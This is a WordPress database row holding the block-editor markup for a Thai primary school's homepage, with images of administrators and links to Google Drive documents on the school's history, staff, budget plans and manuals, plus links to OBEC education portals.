(409,2,'2024-09-24 10:41:44','2024-09-24 03:41:44','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table 